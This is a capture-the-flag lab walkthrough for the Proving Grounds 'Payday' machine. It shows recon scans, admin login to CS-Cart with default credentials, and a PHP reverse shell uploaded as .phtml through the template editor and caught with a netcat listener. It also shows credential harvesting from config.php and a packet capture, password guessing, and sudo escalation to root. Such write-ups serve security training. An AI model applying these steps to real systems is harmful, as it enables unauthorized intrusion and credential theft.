PG Practice: Linux - Payday

Machine Info

Spoiler

In this lab, Learners exploit a Local File Inclusion (LFI) vulnerability in the CS-Cart application to access sensitive system files and uncover critical usernames. Using the retrieved information, Learners will brute-force SSH credentials to gain access to the system and escalate privileges to root using a sudo misconfiguration. This exercise enhances skills in web application exploitation, brute-forcing, and privilege escalation.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

Running second nmap scan with open ports: 22,80,110,139,143,445,993,995
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-09 20:43 CET
Nmap scan report for $VICTIM
Host is up (0.032s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL TOP UIDL CAPA PIPELINING RESP-CODES STLS
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-03-09T19:44:11+00:00; +24s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-03-09T19:44:13+00:00; +24s from scanner time.
|_imap-capabilities: IMAP4rev1 Capability LOGIN-REFERRALS completed SASL-IR LOGINDISABLEDA0001 UNSELECT LITERAL+ IDLE STARTTLS OK NAMESPACE MULTIAPPEND CHILDREN THREAD=REFERENCES SORT
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3    Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_ssl-date: 2026-03-09T19:44:11+00:00; +24s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|broadband router|webcam|firewall
Running (JUST GUESSING): Linux 2.6.X|3.X (96%), Asus embedded (95%), AXIS embedded (95%), WatchGuard embedded (95%), Linksys embedded (94%), Cisco embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/h:watchguard:firebox_x1250e cpe:/h:linksys:wrv54g
Aggressive OS guesses: Linux 2.6.32 - 3.10 (96%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (95%), Asus RT-AC66U router (Linux 2.6) (95%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (95%), Asus RT-N16 WAP (Linux 2.6) (95%), Asus RT-N66U WAP (Linux 2.6) (95%), Tomato 1.28 (Linux 2.6.22) (95%), WatchGuard FireBox X1250e firewall (95%), Linux 2.6.16 (94%), Linksys WRV54G WAP (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2026-03-09T15:44:04-04:00
|_clock-skew: mean: 48m25s, deviation: 1h47m22s, median: 23s

CS-Cart

On port 80 we have CS-Cart an eCommerce platform which has multiple options to explore on teh website. At first we tried registering a new user and it worked.

We do perform as well a directory enumeration as always.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ ffuf -u http://$VICTIM/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -r  


Thumbs.db               [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 20ms]
admin                   [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 80ms]
admin.php               [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 104ms]
addons                  [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 75ms]
catalog                 [Status: 200, Size: 716, Words: 41, Lines: 14, Duration: 21ms]
cgi-bin/                [Status: 403, Size: 308, Words: 22, Lines: 11, Duration: 42ms]
chart                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 167ms]
classes                 [Status: 200, Size: 2174, Words: 137, Lines: 22, Duration: 301ms]
.htpasswd               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 3078ms]
.hta                    [Status: 403, Size: 304, Words: 22, Lines: 11, Duration: 3079ms]
config                  [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 88ms]
core                    [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 76ms]
.htaccess               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 4063ms]
image                   [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 111ms]
init                    [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 22ms]
index.php               [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 99ms]
include                 [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 72ms]
install                 [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 93ms]
index                   [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 202ms]
images                  [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 174ms]
payments                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
prepare                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 26ms]
server-status           [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 30ms]
skins                   [Status: 200, Size: 1287, Words: 77, Lines: 17, Duration: 119ms]
store_closed            [Status: 200, Size: 575, Words: 44, Lines: 16, Duration: 53ms]
var                     [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 69ms]

We see many interesting 200 responses but we focus on the admin page. When trying “default credentials” we manage to actually authenticate as admin.

admin creds

admin:admin

We have successfully authenticated and we take a bit of time to browse the options that the admin has. We do see options to upload files and backup the database. We also find the version of the website which is 1.3.3.

Looking it up online we see a popular authenticated RCE for CS-Cart 1.3.3. We will jump straight to the exploit. In order to exploit this we need to get a PHP shell and upload it in the Template editor. The .php extension is not allowed so we will use .phtml. We are going to use a reverse php shell from revshells.com

After we upload it we start up our listener and we move to http://[victim]/skins/rev.phtml to trigger it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 55175
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 16:08:20 up 28 min,  0 users,  load average: 0.00, 0.02, 0.21
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@payday:/$

www-data@payday:/$ cd home
cd home
www-data@payday:/home$ ls
ls
patrick
www-data@payday:/home$ cd patrick
cd patrick
www-data@payday:/home/patrick$ ls
ls
local.txt

That is how we get a shell and we can get the local.txt.

Root

Root Paranoia

Tip

At first we tried to establish an SSH connection with pair of keys but that was not possible as the home directory of the user www-data had too wide access which the ssh service didn’t allow with its strict mode turned on.

We browsed for a while around and we did find the database credentials.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
/var/www# cat config.php
cat config.php
<?php

//
// $Id: config.php 1822 2006-05-17 16:44:43Z
//

if ( !defined('IN_CSCART') ) { die('Access denied'); }

$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';

Furthermore a local DB was indeed running and we were able to authenticate but nothing was interesting was found.

We then run linpeas.sh and we managed to find that the /root directory was accessible but we couldn’t read the flag nor was any key available.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
ls -al /root
ls -al /root
total 28
drwxr-xr-x  3 root root 4096 2026-03-10 06:35 .
drwxr-xr-x 21 root root 4096 2008-04-24 22:02 ..
-rw-------  1 root root    0 2020-09-03 08:57 .bash_history
-rw-r--r--  1 root root 2448 2016-04-19 03:51 .bashrc
-rw-r--r--  1 root root 2296 2017-03-30 03:28 capture.cap
-rw-r--r--  1 root root  141 2007-05-15 12:07 .profile
----------  1 root root   33 2026-03-10 06:35 proof.txt
drwxr-xr-x  2 root root 4096 2008-09-24 00:24 .ssh

We did find though a pcap file which it made sense of course to investigate.

Info

A PCAP file (Packet Capture) is a binary file format that stores raw network traffic packets.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
www-data@payday:/root$ /usr/sbin/tcpdump -r capture.cap -X
reading from file capture.cap, link-type EN10MB (Ethernet)
.....
       
12:24:28.194032 IP 10.1.1.248.40909 > 10.11.1.220.ftp: P 1:13(12) ack 149 win 229 <nop,nop,timestamp 1849725 148456>
        0x0000:  4510 0040 f2b0 4000 4006 797a 0a01 01f8  E..@..@[email protected]....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c572 8194 9c33  ...........r...3
        0x0020:  8018 00e5 09ef 0000 0101 080a 001c 397d  ..............9}
        0x0030:  0002 43e8 5553 4552 2062 7265 7474 0d0a  ..C.USER.brett..
12:24:28.342433 IP 10.11.1.220.ftp > 10.1.1.248.40909: P 149:182(33) ack 13 win 258 <nop,nop,timestamp 148609 1849725>
        0x0000:  4500 0055 0e4e 4000 8006 1dd8 0a0b 01dc  E..U.N@.........
        0x0010:  0a01 01f8 0015 9fcd 8194 9c33 edcb c57e  ...........3...~
        0x0020:  8018 0102 b5b0 0000 0101 080a 0002 4481  ..............D.
        0x0030:  001c 397d 3333 3120 5061 7373 776f 7264  ..9}331.Password
        0x0040:  2072 6571 7569 7265 6420 666f 7220 6272  .required.for.br
        0x0050:  6574 740d 0a                             ett..
12:24:28.342540 IP 10.1.1.248.40909 > 10.11.1.220.ftp: . ack 182 win 229 <nop,nop,timestamp 1849762 148609>
        0x0000:  4510 0034 f2b1 4000 4006 7985 0a01 01f8  E..4..@[email protected].....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54  ...........~...T
        0x0020:  8010 00e5 b803 0000 0101 080a 001c 39a2  ..............9.
        0x0030:  0002 4481                                ..D.
12:24:30.985896 IP 10.1.1.248.40909 > 10.11.1.220.ftp: P 13:36(23) ack 182 win 229 <nop,nop,timestamp 1850423 148609>
        0x0000:  4510 004b f2b2 4000 4006 796d 0a01 01f8  E..K..@[email protected]....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54  ...........~...T
        0x0020:  8018 00e5 6342 0000 0101 080a 001c 3c37  ....cB........<7
        0x0030:  0002 4481 5041 5353 2069 6c6f 7665 7365  ..D.PASS.ilovese
        0x0040:  6375 7269 7479 746f 6f0d 0a              curitytoo..
12:24:31.131666 IP 10.11.1.220.ftp > 10.1.1.248.40909: P 182:197(15) ack 36 win 258 <nop,nop,timestamp 148888 1850423>
        0x0000:  4500 0043 0e57 4000 8006 1de1 0a0b 01dc  E..C.W@.........
        0x0010:  0a01 01f8 0015 9fcd 8194 9c54 edcb c595  ...........T....
        0x0020:  8018 0102 a001 0000 0101 080a 0002 4598  ..............E.
        0x0030:  001c 3c37 3233 3020 4c6f 6767 6564 206f  ..<7230.Logged.o
        0x0040:  6e0d 0a                                  n..
.....

From our search we managed to get a set of credentials. Specifically brett:ilovesecuritytoo as we can see from the hex editor above. But we couldn’t use them nowhere! This was a bit frustrating to say the least.

Later, we explored many exploits but none worked for us. Linux kernel and many software were ancient but nothing worked for our purposes since we didn’t have any user password.

We tried many different ideas but it seemed that we were stuck….

And then we saw from the linpeas output a hint to try on all known users the username as password! So basically it gave us the idea of bruteforcing but we tried something for patrick user and it worked!

Patrick's password

1
2
3
4
5
6

www-data@payday:/tmp$ su patrick
su patrick
Password: patrick

patrick@payday:/tmp$

Here we paused a little bit to calm down as we had lost so much time on other attack paths whereas this one was stupid-simple. After two rabbit holes we got the intended one.

With patrick user we can just elevate our privileges to root as it is permitted.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
patrick@payday:/tmp$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:patrick

User patrick may run the following commands on this host:
    (ALL) ALL
patrick@payday:/tmp$ sudo su 
sudo su 
root@payday:/tmp# cd /root
cd /root
root@payday:~# ls
ls
capture.cap  proof.txt
root@payday:~# cat proof.txt
cat proof.txt
<REDACTED>
root@payday:~# 

Tip

I guess the tip here is to never skip trying username = password….

Machine Info#

User#

Reconnaissance#

CS-Cart#

Root#

Root Paranoia#